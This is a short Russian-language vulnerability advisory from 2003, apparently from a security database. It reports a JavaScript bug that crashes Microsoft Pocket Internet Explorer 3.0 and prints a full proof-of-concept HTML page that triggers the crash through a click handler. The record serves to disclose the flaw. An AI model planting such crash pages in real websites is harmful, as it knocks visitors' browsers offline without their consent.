Дата публикации: | 08.01.2003 |
Всего просмотров: | 1257 |
Опасность: | |
Наличие исправления: | |
Количество уязвимостей: | 1 |
CVE ID: | Нет данных |
Вектор эксплуатации: | |
Воздействие: | |
CWE ID: | Нет данных |
Наличие эксплоита: | Нет данных |
Уязвимые продукты: | |
Описание: | Обнаруженная уязвимость позволяет злонамеренной Web странице, содержащей некорректный JavaScript код, аварийно завершить работу Microsoft Pocket Internet Explorer. Пример:
<html> <head> <title>Crash PIE</title> <script language="Javascript"> function displayPage(page){ if(page=="onload"){ main.innerHTML="<a href=\"#\" onClick=\"displayPage('crash');\">Crash me</a>"; } if(page=="crash"){ main.innerHTML="<a href=\"#\" onClick=\"displayPage('crash');\">You are going down!</a>"; } } </script> </head> <body onLoad="displayPage('onload');"> <hr> <span id="main"></span> </body></html>Уязвимость обнаружена в Microsoft Pocket Internet Explorer 3.0 |
Ссылки: | JS Bug makes it possible to deliberately crash Pocket PC IE |